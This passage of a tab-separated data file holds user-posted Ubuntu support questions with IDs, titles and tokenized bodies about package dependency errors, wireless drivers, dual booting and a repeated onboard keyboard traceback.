apt-get install ia32-libs-multiarch , and i got this : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ia32-libs-multiarch : i386 : depends : gstreamer0.10-plugins-good : i386 but it is not going to be installed depends : gtk2-engines : i386 but it is not going to be installed depends : gtk2-engines-murrine : i386 but it is not going to be installed depends : gtk2-engines-pixbuf : i386 but it is not going to be installed depends : gtk2-engines-oxygen : i386 but it is not going to be installed depends : ibus-gtk : i386 but it is not going to be installed depends : libcanberra-gtk-module : i386 but it is not going to be installed depends : libgail-common : i386 but it is not going to be installed depends : libgtk2.0-0 : i386 but it is not going to be installed depends : librsvg2-common : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . i think it 's pretty obvious at this point that my 32libs are either gone or no longer recognized , but i have no idea why .
345903	why newer ubuntu versions are slower in performance ?	my laptop dell inspiron n5110 ubuntu and windows 7 i installed ubuntu 13.04 in my laptop , but its seemed to be slower than windows 7 and i am completely surprised , i feel shamed in front of my friend because i told him that ubuntu is best and fastest linux based operating system . what is roaming in my mind ? ubuntu > version 10.x is slower and have a lot of problems in it . what are problems/questions ? why my wifi is slower in ubuntu 13.04 than windows 7 ? why performance speed is slower than windows 7 ? why ubuntu > version 10.x is slow ? why ubuntu newer version consume more laptop battery energy ? is these problems are due to unity ? i notice gnome is faster than unity .
345904	attaching to a service in screen	i am fairly new to ubuntu , but i am becoming better everyday . i know that to detach from a service in screen you do ctrl+a+d . but i do not know how to attach back to it when i need to . can someone tell me what the command is to attach back to running screen services ?
345905	broadcom sta 4312 wireless not working after waking in 13.04	i installed 13.04 from the iso dvd , running as dual boot with vista , followed by the bcm 4312 wireless driver via ethernet . i then disconnected from ethernet , as wifi was working and the wifi led indicator was on . i hit suspend , and when i woke ubuntu about 30 minutes later , it appeared as if the wireless driver was n't installed . did ubuntu blacklist the driver ? how do i get it working again ?
345911	raid volumes not recognized ubuntu 12.04 on hp envy dv6	i have installed ubuntu 12.04 on my hp envy dv6 but i get a message every time i boot the system that raid volumes are not recognized . after a time out of 10 secs the boot continues to grub menu and then boots up normally . i would like to know how can i solve this problem and how can i identify raid volumes on my ubuntu .
345912	ubuntu 13.04 disk fails to boot : failure reading sector 0x60100 from cd01	i wish to dual boot windows 8 and ubuntu 13.04 to see if i can now , after five years of switching to ubuntu and finding it does n't have everything i need , finally make the transition from a windows to a linux user . i have a hp envy m6 laptop and i 'm trying to load the ubuntu 13.04 x64 cd . i 've tried it with secure boot turned on and off and manage to get to the gnu grub 2.00 menu . here , i select 'install ubuntu ' and every time the screen goes black for about a minute before the message : failure reading sector 0x60100 from cd01 along with the line : need kernal or something or other ! does anyone know a way around this issue ? i 've ruled out it 's not my dvds as i tried burning the iso twice and also tried a xubuntu 13.04 disk i had lying around . any help would be greatly appreciated .
345913	how to enable vb scripting	i tried getting a game that is created for windows , i used my wine windows program loader and it seemed to be installing it , but then something popped up that said i have to enable vb scripting , i am pretty new to ubuntu and i do n't know much about it . by the way i have ubuntu 12.04 .
345914	dual boot windows 7 and ubuntu 12.04 lts . no option for windows 7 , already multiple os ?	i have ubuntu 12.04 on a usb flash drive . i went into bios and changed the boot order to prioritizing usb , just to try it out live . afterwards , i decided to take the plunge and install ubuntu as a secondary os ( dual boot ) . while reviewing some videos , i noted that it should have the choice of dual booting with windows , overwrite windows.. etc . however , i do not see any of those choices . all i 'm seeing is erase disk and install ubuntu or something else . further it says : this computer currently has multiple operating systems on it . am i reading this wrong ? i do n't want to choose option erase disk and install ubuntu and risking on losing the windows operating system . is it saying that i have multiple o.s because of me booted it with a usb flash drive ? edit : i have since taken a few further steps , but i am still not sure what to do next ? i right clicked on computer > select management > then select disk management and it shows me 4 partitions . 3 on hard drive , and 1 is pendrive ( the usb ) removable . despite this , it is showing pendrive as a primary active partition . on disk 0 i have 3 partitions a . ) 1.46gb active recovery b . ) 450.57gb boot , crash dump etc . c. ) 13.73gb primary partition . then on disk 1 i have the pendrive 1.87 gb active , primary partition . according to partition test in ubuntu , it shows only 3 partitions ( if i 'm reading it correctly ) but in windows it shows 4 ( if it includes disk 1 ) . i 'm not sure what the red exclamation point is for on ubuntu gpartition test . meanwhile , while checking on partiton in windows , everything looks fine . all read as healthy , and c : still has 59 % available space . here is what i get when i right click on damaged ntsf inside of gpartition > select check > select green checkmark . it runs 6 seconds then error message . 0 of 1 operations completed . i tried to save details , but there are no details entered into root box to save .
345916	burning dvd is taking too long	i am using ubuntu 12.04 and i used to burn my dvds with brasero disc burner without any problem until a month ago . but recently the process is taking too long than normal . the process proceeds as normal but in the end , it gets stuck with finalizing message and nothing happens . i ca n't even eject my dvd drive after the finalizing message . the dvd drive is able to read the dvds normally ; only writing new dvds is a problem ( copying to/from flash drives has no problem ) .
345923	erase and install a fresh copy of ubuntu to start over	i bought this hp mini off an old friend . well it has been running for quiet a while and it seems like since 2001 ( that'as the recent modified dates seen on the files ) . this is my first laptop with ubuntu and it seems i 've made a mess with the system since then . i was just wondering if i could erase and start over with a fresh copy since is no such option to restore to factory command similar to windows . i recently upgraded it , even-though i had no idea what i was doing and it changed from 10.04 to 12.04 . but the power cord came out , and battery died while i was asleep . regardless , i should say that the upgrade went half . nevertheless , i logged-in finally , but now all kinds of errors pops-up as i have duplicate things going on . all i wanted is to start from scratch with fresh install . how can i achieve this ? ?
345925	problem on connect 3g modem on ubuntu 13.04	i live in republic of moldova , my internet provider is `` unite '' , i tried to connect with my 3g modem `` huawei e173 '' and without succes . in provider 's list is n't unite and i can n't connect with manual configuration , i call my internet support and ask about this problem and they reply me to set the apn - > internet.unite.md and the privider name - > unite , but do n't work : ( what i can do ? lvc @ lvc-lenovo-z580 : ~ $ lsusb bus 001 device 008 : id 12d1:1c05 huawei technologies co. , ltd. e173s 3g broadband stick ( modem on ) bus 001 device 003 : id 0bda:0139 realtek semiconductor corp. card reader
345927	how can i get the wifi to work on my acer aspire 5710 ?	i have tried a whole bunch of things.. from rfkill lists to unblocking to restarting network to downloading windows wireless drivers to installing firmware.. i really just need some quick direction from someone please help guide this anti microsoft user to nail this problem ! lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 sata controller : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ahci mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 04:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) 05:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 06:00.0 flash memory : ene technology inc ene pci memory stick card reader controller 06:00.1 sd host controller : ene technology inc ene pci smartmedia / xd card reader controller 06:00.2 flash memory : ene technology inc memory stick card reader controller 06:00.3 flash memory : ene technology inc ene pci secure digital / mmc card reader controller lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub for braiam annette @ annette-aspire-5710z : ~ $ sudo lspci -nnk -s 05:00.0 [ sudo ] password for annette : ksorry , try again . [ sudo ] password for annette : sorry , try again . [ sudo ] password for annette : 05:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11b/g wlan [ 14e4:4311 ] ( rev 01 ) subsystem : ambit microsystem corp. device [ 1468:0422 ] kernel driver in use : b43-pci-bridge kernel modules : ssb annette @ annette-aspire-5710z : ~ $
345930	how can i remove firefox user data folder from ubuntu 13.04 ?	how can i remove firefox user data folder from ubuntu 13.04 ? my firefox is too slow whenever it get slows on my other operating system i just simply remove userdata folder but how can i remove from ubuntu 13.04 ?
345934	no ubuntu 12.04 toolbar when installed through vmware workstation	i just installed ubuntu 12.04 inside vmware workstation . i 'm new to both vmware and ubuntu . when i open ubuntu up , there 's no menu anywhere . is i move my mouse around , i can see that it 's highlighting toolbar options on the leftside , but i ca n't tell what those options are . i can click and open things up , but that is n't very helpful . i 've tried changing the background image , but that does n't fix it . any idea how to make the toolbar show up ? is it because i 'm running it through vmware workstation ?
345935	do some files downloaded from the internet have execute permission by default ?	i noticed that some files downloaded from the internet have executing permission ( e.g . tor , bit-torrent , sync etc . ) by default . therefore the permission information is stored within the files itself , but not on the computer . does that mean , that there 's a possibility for hackers to create viruses and set execute permission ? if that 's so , hackers could trick the user to execute the virus . from this point of view , security on linux is not better than windows . can someone explain this clearly to me ?
345943	xen works , but i ca n't passthroug vga	i did everything , i binded my graphic card ( ati radeon hd 7850 ) with xen-pciback , and with pci-stub ... i 've set the iommu=1 to the xen kernel and intel_iommu=on to the linux kernel , and all the posible combinations of the kernel/moule settings , and nothing worked ... please helpme do n't know what could be my next thing to test ( sorry for my bad english ) p.d : i 'm using virt-manager my mobo is an asus p8h77m-pro and my cpu is a core i5 3330 ivy bridge
345946	ca n't install nvidia-drivers due to low graphics mode error	my pc configuration is as follows : ubuntu 12.04.3 64 bit msi fx-600 intel core i3-330m 4 gb ram nvidia gt 325m i installed cuda toolkit few days ago . everything was working fine . but then from additional drivers option i activated post release updates . . but that caused the low-graphics-mode-error . i solved it somewhat by pressing ctrl alt f1 and uninstalling nvidia-319-updates . but now every time i install nvidia-current , it goes to driver error stage . as a result cuda-toolkit is not working too . most desirable solution : graphics not rendered by nvidia . because nvidia driver is buggy , e.g . some animations do n't work.but i think that should save charge too . primary requirement : a way to get cuda-toolkit working on my system
345950	13.04 launcher does n't work	i have 13.04 installed , and when i click to open the launcher , it acts like it 's open , but does n't display . what 's wrong ?
345951	is there a way to disable 4-finger unity gestures without compiling unity sources ?	to date i could only find solutions that involve recompiling unity sources and avoiding updates , is there a way to disable 4-finger unity gestures without compiling unity sources ? update i already compiled the sources and blocked updates ...
345954	installing lubuntu on a ppc mac pro	i have a mac pro ( ppc model , g3 quicksilver ) that i would like to run lubuntu on . it has two internal hdds : one is 41gb and the other is 20gb . mac os x is already on the 41gb drive , but i would like lubuntu to be installed on the 20gb drive and pick which to use at boot ( like dual-boot , but on two different drives ) . i ca n't figure out how to partition the drives during installation . what partitions do i need ? what type do they need to be ? where do they need to be mounted ? how big do they need to be ? i would like the main partition to be 15gb , with swap about 2gb-4gb . the machine : 1024gb ram 733 mhz cpu
345955	ubuntu 10.04 installs and works great , but newer versions 12.04 and 13.04 wo n't run after install	i have a weird issue here . have a custom pc running a : msi ms-6380 mobo amd athlon 1800+ 1 gig memory ( crucial ) ati rage 128 video card . 40 gig western digital hdd . yes , it 's an older machine , but actually runs window xp and ubuntu 10.04 great . wanted to set it up for just ubuntu , and tried to install 13.04 in which i can go through the installation of it , but the pc will not boot or load up the os after that . i get a blank screen with just the mouse on it . ( and yes , the mouse works , ie move mouse and curser moves on screen ) . same thing if i try to do an install with 12.04. any ideas as to why i 'm having these issues ? is my hardware no longer supported by ubuntu 's newer editions ? thanks for your help , karl
345956	unable to update ubuntu server due to unmet dependensies	when i am trying to install system update on my ubuntu server 13.04 amd64 it returns the following message : now updating apparmor .. installing package ( s ) with command apt-get -y install apparmor .. dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.44.53 ) ; however : version of linux-image-server on system is 3.2.0.53.63. linux-server depends on linux-headers-server ( = 3.2.0.44.53 ) ; however : version of linux-headers-server on system is 3.2.0.53.63. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-server reading package lists ... building dependency tree ... reading state information ... you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-server : depends : linux-image-server ( = 3.2.0.44.53 ) but 3.2.0.53.63 is to be installed depends : linux-headers-server ( = 3.2.0.44.53 ) but 3.2.0.53.63 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . .. install failed ! i have tried all the common things listed in the article below , but it still gives the same message . how do i resolve unmet dependencies ? hi , here is the output of that command : sudo apt-get check reading package lists ... building dependency tree ... reading state information ... you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : linux-server : depends : linux-image-server ( = 3.2.0.44.53 ) but 3.2.0.53.63 is installed depends : linux-headers-server ( = 3.2.0.44.53 ) but 3.2.0.53.63 is installed e : unmet dependencies . try using -f. > sudo apt-get -qq update & & apt-cache policy linux-server linux-server : installed : 3.2.0.44.53 candidate : 3.2.0.53.63 version table : 3.2.0.53.63 0 500 http : //no.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages *** 3.2.0.44.53 0 100 /var/lib/dpkg/status 3.2.0.23.25 0 500 http : //no.archive.ubuntu.com/ubuntu/ precise/main amd64 packages rgds e andersen
345957	dpkg remove , dependencies problems	i have just reinstalled ubuntu 12.04 . i was sure i was installing the 32 bits version , however it turns out ( wt* ? ? ? ) it is actually a 64 bits version . in the meantime , i tried to install some library in its 32 bits version . it did n't work , somehow i ended up with sudo apt-get -f install going crazy and wanting to delete everything . i stopped there with the 32 bits library . then i realized i was running a 64 bits os , so i downloaded the 64 bits version of the lib . before running the installation script , i ran the 32 bits lib 's remove script , with the following result : dpkg : warning : there 's no installed package matching updatorgui dpkg : warning : there 's no installed package matching flycapture-doc dpkg : warning : there 's no installed package matching flycap ... etc . which makes sense , since i never managed to install the 32 bits lib . so one may think that i could now install the 64 . uh oh : installing flycapture2 packages ... dpkg : error processing libflycapture-2.5.3.4_amd64.deb ( -- install ) : libflycapture2 : 2.5.3.4 ( multi-arch : no ) is not co-installable with libflycapture2 : i386 2.5.3.4 ( multi-arch : no ) which is currently installed so , my questions are : how do i clean up dpkg , or remove the 32 bits stuff , and then install my lib ? how do i fix apt-get so it does n't want to delete the whole system ? how is this possible that i installed ubuntu 64 when i 'm sure i downloaded the 32 torrent ? i really tried to make things right , but i 'm quite stuck now ...
345959	12.04 keystone charm fails to deploy : how do i debug it ?	i have a maas setup and on top of that i 'm trying deploying openstack , following the video at https : //www.youtube.com/watch ? v=v2h3fat0k5w the problem i am having is that the keystone charm keeps saying that there is an install error . i have no idea where to look and see what went wrong . where should i start on trying to figure out what is not working ? is there a log or anything i can look at ? i 'm using 12.04 for the maas server and the maas nodes .
345961	on board problems in kubuntu 13.04	after a fresh install of kubuntu 13.04 , i installed the on-board on-screen keyboard that i was familiar with from my previous vanilla ubuntu lts install . the program was available through the repositories already , but when launching on-board , it does n't seem to work properly . many of the keys are missing and i can not seem to change the keyboard in order to type my pre-configured snippets . i have attached a screenshot of the issue as well as the output i get when running it from a terminal . i know that there are other on-screen keyboards for kde , but i find the mouse and snippet features of on-board to be critical and without peer among all the on-screen keyboard options . is there a way i can get on-board working with kde ? thanks . xlegs @ alphonse : ~ $ onboard ( onboard:3752 ) : gtk-warning ** : theme directory 64x64/status of theme hycons has no size field ( onboard:3752 ) : gtk-warning ** : theme directory 128x128/status of theme hycons has no size field ( onboard:3752 ) : gtk-warning ** : theme directory 256x256/actions of theme hycons has no size field ( onboard:3752 ) : gtk-warning ** : theme directory 256x256/places of theme hycons has no size field ( onboard:3752 ) : gtk-warning ** : theme directory 256x256/status of theme hycons has no size field ( onboard:3752 ) : gtk-warning ** : theme directory 512x512/apps of theme hycons has no size field ( onboard:3752 ) : gtk-warning ** : theme directory 512x512/status of theme hycons has no size field fontconfig warning : `` /etc/fonts/conf.d/50-user.conf '' , line 9 : reading configurations from ~/.fonts.conf is deprecated . traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , in constructor return info.invoke ( cls , *args , **kwargs ) gi._glib.gerror : unrecognized image file format traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/onboard/keyboardwidget.py '' , line 1098 , in _on_draw decorated = layoutview.draw ( self , widget , context ) file `` /usr/lib/python3/dist-packages/onboard/layoutview.py '' , line 200 , in draw item.draw_cached ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 123 , in draw_cached surface = self._create_key_surface ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 142 , in _create_key_surface self.draw ( context ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 148 , in draw self.draw_image ( context , lod ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 398 , in draw_image pixbuf = self.get_image ( rect.w , rect.h ) file `` /usr/lib/python3/dist-packages/onboard/keygtk.py '' , line 589 , in get_image new_from_file_at_size ( filename , width , height ) file `` /usr/lib/python3/dist-packages/gi/types.py '' , line 137 , 